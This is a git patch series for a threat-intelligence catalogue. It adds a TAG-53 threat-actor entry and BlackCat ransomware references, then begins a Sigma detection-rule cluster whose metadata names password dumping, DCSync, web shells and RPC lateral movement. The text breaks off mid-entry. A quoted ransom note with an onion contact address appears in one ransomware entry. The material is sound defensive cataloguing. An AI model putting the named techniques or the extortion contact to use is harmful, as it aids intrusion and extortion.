From 5931f51d7a1cc99030026ecb8ac9114b5ad61616 Mon Sep 17 00:00:00 2001 From: Delta-Sierra Date: Thu, 8 Dec 2022 11:31:02 +0100 Subject: [PATCH 01/13] add TAG-53 --- clusters/ransomware.json | 5 +++-- clusters/threat-actor.json | 23 ++++++++++++++++++++++- 2 files changed, 25 insertions(+), 3 deletions(-) diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 8331c35..d1f599c 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -24381,7 +24381,8 @@ "https://www.varonis.com/blog/alphv-blackcat-ransomware", "https://www.intrinsec.com/alphv-ransomware-gang-analysis", "https://unit42.paloaltonetworks.com/blackcat-ransomware/", - "https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat" + "https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat", + "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/" ], "synonyms": [ "ALPHV", @@ -24724,7 +24725,7 @@ "ransomnotes": [ "Your data are stolen and encrypted\nThe data will be published on TOR website if you do not pay the ransom\nYou can contact us and decrypt one file for free on this TOR site (you should download and install TOR browser first https://torproject.org) https://aazsbsgya565y1u2c6Lay6yfiebkcbtvvcytyolt33s77xypi7nypxyd.onion/ \n\nYour company id for log in: [REDACTED]" ], - "ransomnotes-files": [ + "ransomnotes-filenames": [ "readme.txt" ], "ransomnotes-refs": [ diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index c5d73f0..3aa75c7 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -9943,7 +9943,28 @@ }, "uuid": "171d0590-be92-443f-addb-af5dc2a8034d", "value": "Evasive Panda" + }, + { + "description": "A Russia-linked threat actor tracked as TAG-53 is running phishing campaigns impersonating various defense, aerospace, and logistic companies, according to The Record by Recorded Future. Recorded Future’s Insikt Group identified overlaps with a threat actor tracked by other companies as Callisto Group, COLDRIVER, and SEABORGIUM.", + "meta": { + "refs": [ + "https://blog.knowbe4.com/russian-threat-actor-impersonates-aerospace-and-defense-companies", + "https://www.recordedfuture.com/exposing-tag-53-credential-harvesting-infrastructure-for-russia-aligned-espionage-operations?utm_campaign=PostBeyond&utm_source=Twitter&utm_medium=359877&utm_term=Exposing+TAG-53%E2%80%99s+Credential+Harvesting+Infrastructure+Used+for+Russia-Aligned+Espionage+Operations", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-1205.pdf" + ] + }, + "related": [ + { + "dest-uuid": "fbd279ab-c095-48dc-ba48-4bece3dd5b0f", + "tags": [ + "estimative-language:likelihood-probability=\"likely\"" + ], + "type": "overlaps" + } + ], + "uuid": "e5865ca1-ec95-43e2-954a-d0f3507a9747", + "value": "TAG-53" } ], - "version": 255 + "version": 256 } From cb19f6bda70da248f344a2d4451c2694de336b2a Mon Sep 17 00:00:00 2001 From: jstnk9 Date: Fri, 9 Dec 2022 08:48:54 +0100 Subject: [PATCH 02/13] galaxy for sigma rules --- clusters/sigma-rules.json | 63262 ++++++++++++++++++++++++++++++++++++ galaxies/sigma-rules.json | 9 + 2 files changed, 63271 insertions(+) create mode 100644 clusters/sigma-rules.json create mode 100644 galaxies/sigma-rules.json diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json new file mode 100644 index 0000000..a94cb72 --- /dev/null +++ b/clusters/sigma-rules.json @@ -0,0 +1,63262 @@ +{ + "authors": [ + "@Joseliyo_Jstnk" + ], + "category": "rules", + "description": "MISP galaxy cluster based on Sigma Rules.", + "name": "Sigma-Rules", + "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", + "type": "sigma-rules", + "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", + "values": [ + { + "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", + "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", + "value": "Antivirus Exploitation Framework Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_exploiting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2018/09/09", + "filename": "av_exploiting.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", + "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", + "value": "Antivirus Hacktool Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_hacktool.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ], + "creation_date": "2021/08/16", + "filename": "av_hacktool.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a password dumper", + "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", + "value": "Antivirus Password Dumper Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_password_dumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558", + "attack.t1003.001", + "attack.t1003.002" + ], + "creation_date": "2018/09/09", + "filename": "av_password_dumper.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", + "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", + "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection", + "meta": { + "refs": [ + "https://twitter.com/mvelazco/status/1410291741241102338", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_printernightmare_cve_2021_34527.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/07/01", + "filename": "av_printernightmare_cve_2021_34527.yml", + "author": "Sittikorn S, Nuttakorn T, Tim Shelton", + "level": "critical", + "falsepositive": [ + "Unlikely, or pending PSP analysis" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a highly relevant Antivirus alert that reports ransomware", + "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", + "value": "Antivirus Ransomware Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/?s=antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" + ], + "tags": [ + "attack.t1486" + ], + "creation_date": "2022/05/12", + "filename": "av_ransomware.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", + "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", + "value": "Antivirus Relevant File Paths Alerts", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_relevant_files.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ], + "creation_date": "2018/09/09", + "filename": "av_relevant_files.yml", + "author": "Florian Roth, Arnim Rupp", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", + "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", + "value": "Antivirus Web Shell Detection", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", + "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2018/09/09", + "filename": "av_webshell.yml", + "author": "Florian Roth, Arnim Rupp", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "antivirus", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", + "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", + "value": "Django Framework Exceptions", + "meta": { + "refs": [ + "https://docs.djangoproject.com/en/1.11/ref/exceptions/", + "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/08/05", + "filename": "appframework_django_exceptions.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "django" + } + }, + { + "description": "Generic rule for SQL exceptions in Python according to PEP 249", + "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", + "value": "Python SQL Exceptions", + "meta": { + "refs": [ + "https://www.python.org/dev/peps/pep-0249/#exceptions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/python/app_python_sql_exceptions.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2017/08/12", + "filename": "app_python_sql_exceptions.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Application bugs" + ], + "logsource.category": "application", + "logsource.product": "python" + } + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via ATSvc", + "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", + "value": "Remote Schedule Task Lateral Movement via ATSvc", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_atsvc_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", + "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", + "value": "Remote Schedule Task Recon via AtScv", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_atsvc_recon.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.", + "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", + "value": "Possible DCSync Attack", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" + ], + "tags": [ + "attack.t1033" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_dcsync_attack.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "uuid": "5f92fff9-82e2-48eb-8fc1-8b133556a551", + "value": "Remote Encrypting File System Abuse", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_efs_abuse.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Legitimate usage of remote file encryption" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to get event log information via EVEN or EVEN6", + "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", + "value": "Remote Event Log Recon", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_eventlog_recon.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Remote administrative tasks on Windows Events" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task", + "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", + "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_itaskschedulerservice_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks", + "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", + "value": "Remote Schedule Task Recon via ITaskSchedulerService", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_itaskschedulerservice_recon.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR", + "uuid": "bc3a4b0c-e167-48e1-aa88-b3020950e560", + "value": "Remote Printing Abuse for Lateral Movement", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_printing_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Actual printing" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.", + "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", + "value": "Remote DCOM/WMI Lateral Movement", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1021/003/", + "https://attack.mitre.org/techniques/T1047/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.003", + "attack.t1047" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_dcom_or_wmi.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Some administrative tasks on remote host" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to modify the registry and possible execute code", + "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", + "value": "Remote Registry Lateral Movement", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1112/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_registry_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Remote administration of registry values" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to collect information", + "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", + "value": "Remote Registry Recon", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_registry_recon.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Remote administration of registry values" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", + "uuid": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", + "value": "Remote Server Service Abuse", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" + ], + "tags": [ + "attack.lateral_movement" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_server_service_abuse.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Legitimate remote share creation" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR", + "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", + "value": "Remote Server Service Abuse for Lateral Movement", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0008/", + "https://attack.mitre.org/techniques/T1569/002/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1569.002" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_remote_service_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Administrative tasks on remote services" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to create or execute a scheduled task via SASec", + "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", + "value": "Remote Schedule Task Lateral Movement via SASec", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1053/", + "https://attack.mitre.org/tactics/TA0008/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1053", + "attack.t1053.002" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_sasec_lateral_movement.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls to read information about scheduled tasks via SASec", + "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", + "value": "Recon Activity via SASec", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/01/01", + "filename": "rpc_firewall_sasec_recon.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", + "value": "SharpHound Recon Account Discovery", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1087/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" + ], + "tags": [ + "attack.t1087" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_sharphound_recon_account.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": "rpc_firewall" + } + }, + { + "description": "Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.", + "uuid": "6d580420-ff3f-4e0e-b6b0-41b90c787e28", + "value": "SharpHound Recon Sessions", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1033/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" + ], + "tags": [ + "attack.t1033" + ], + "creation_date": "2022/01/01", + "filename": "rpc_firewall_sharphound_recon_sessions.yml", + "author": "Sagie Dulce, Dekel Paz", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "application", + "logsource.product": 